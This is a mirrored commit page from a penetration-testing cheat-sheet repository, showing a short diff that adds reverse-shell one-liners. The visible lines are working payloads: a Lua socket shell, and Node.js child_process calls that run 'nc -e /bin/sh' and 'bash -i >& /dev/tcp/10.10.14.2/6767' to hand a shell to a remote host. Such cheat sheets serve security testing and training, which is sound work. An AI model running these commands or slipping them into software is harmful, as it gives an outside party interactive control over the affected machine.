1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00

GitBook: [#2836] update

This commit is contained in:
CPol 2021-11-08 23:40:13 +00:00 committed by gitbook-bot
parent 0b4434e0e0
commit 45c01e59e5
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -156,6 +156,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
or